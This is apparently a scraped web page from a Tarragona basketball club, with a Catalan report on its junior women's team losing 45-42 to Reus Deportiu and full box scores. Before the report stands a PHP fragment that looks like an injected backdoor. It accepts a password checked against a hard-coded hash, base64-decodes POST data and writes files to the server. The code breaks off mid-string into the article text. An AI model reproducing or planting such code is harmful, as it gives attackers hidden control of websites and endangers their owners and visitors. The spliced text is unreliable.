function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Júnior fem. 06-07A es queda a un pas de la remuntada (45-42) - Tgn Bàsquet Club -

El Júnior fem. 06-07A es queda a un pas de la remuntada (45-42)

Updated: febrer 9, 2024

Partit que començava horrible per a les del TGN, encaixant un 17-0 d’inici al partit, on molt de ritme i velocitat de les locals, i les visitants sense saber per on els venia. La diferència de punts va arribar a ser de 25 punts al minut 15 de partit, però al segon quart les del TGN anotaven amb més fluïdesa, cosa que no era difícil. Tot i això al descans encara hi havia una diferència de 21 punts a favor de les locals.

A la segona part les locals es van confiar, van baixar el nivell, mentre que les del TGN van voler dignificar el seu partit, i entre una millor defensa de les del TGN i un percentatge horrible de les locals al tercer quart, les del TGN es van anar venint amunt i les locals van començar a notar els nervis.

L’últim quart seria una rèplica del primer, les locals ja no anaven a la línia de tirs lliures, però ja només van produir en 2 cistelles, de triple això sí. Les del TGN es van quedar a 3 punts de la remuntada, amb un minut més de partit… Tornen els fantasmes de començar els partits horriblement i haver de remuntar. Seguim treballant LILES!

REUS DEPORTIU VIORCAM NEGRE 45  –  TGN BÀSQUET 0607A 42

REUS DEPORTIU VIORCAM NEGRE: Zerouali (7), Palleja (0), Miguel (2), Rodríguez (11), Peinado (5) —cinc inicial— Adrubau (5), Díaz (2), Queralt (9), Bosque (2), Kortendick (0), Gutierrez (2), i  Dalmau, I (0).  5 triples: Queralt (3), Adrubau (1), Rodríguez (1). 6/21  tirs lliures. 24 faltes. Eliminats. Peinado (min 40), Queralt (min 39).

TGN BÀSQUET 0607A: Iglesias (4), Estebanell (0), Toda (3), Monzón (9), Bonet (4),—cinc inicial—Castellví (9), Comino (6), Menzinger (4), Fernández (0). i Ramón (3).  2 triples: Comino (3)  10/27  tirs lliures. 18 faltes. Eliminats: Estebanell (min 31)

PARCIALS: 21-03, 13-10, 05-14, 06-15.